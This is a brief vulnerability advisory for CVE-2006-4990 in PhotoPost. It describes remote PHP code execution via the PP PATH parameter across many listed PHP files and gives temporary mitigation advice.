Photopost · Photopost · CVE-2006-4990
**Name of the Vulnerable Software and Affected Versions**
PhotoPost (affected versions not specified)
**Description**
The issue allows remote attackers to execute arbitrary PHP code via a URL in the `PP PATH` parameter in multiple PHP files, including "addfav.php", "adm-admlog.php", "adm-approve.php", "adm-backup.php", "adm-cats.php", "adm-cinc.php", "adm-db.php", "adm-editcfg.php", "adm-inc.php", "adm-index.php", "adm-modcom.php", "adm-move.php", "adm-options.php", "adm-order.php", "adm-pa.php", "adm-photo.php", "adm-purge.php", "adm-style.php", "adm-templ.php", "adm-userg.php", "adm-users.php", "bulkupload.php", "cookies.php", "comments.php", "ecard.php", "editphoto.php", "register.php", "showgallery.php", "showmembers.php", "useralbums.php", "uploadphoto.php", "search.php", and "adm-menu.php".
**Recommendations**
As a temporary workaround, consider restricting access to the `PP PATH` parameter in the affected PHP files until a patch is available.
Restrict access to the vulnerable PHP files to minimize the risk of exploitation.
Avoid using the `PP PATH` parameter in the affected files until the issue is resolved.
At the moment, there is no information about a newer version that contains a fix for this vulnerability.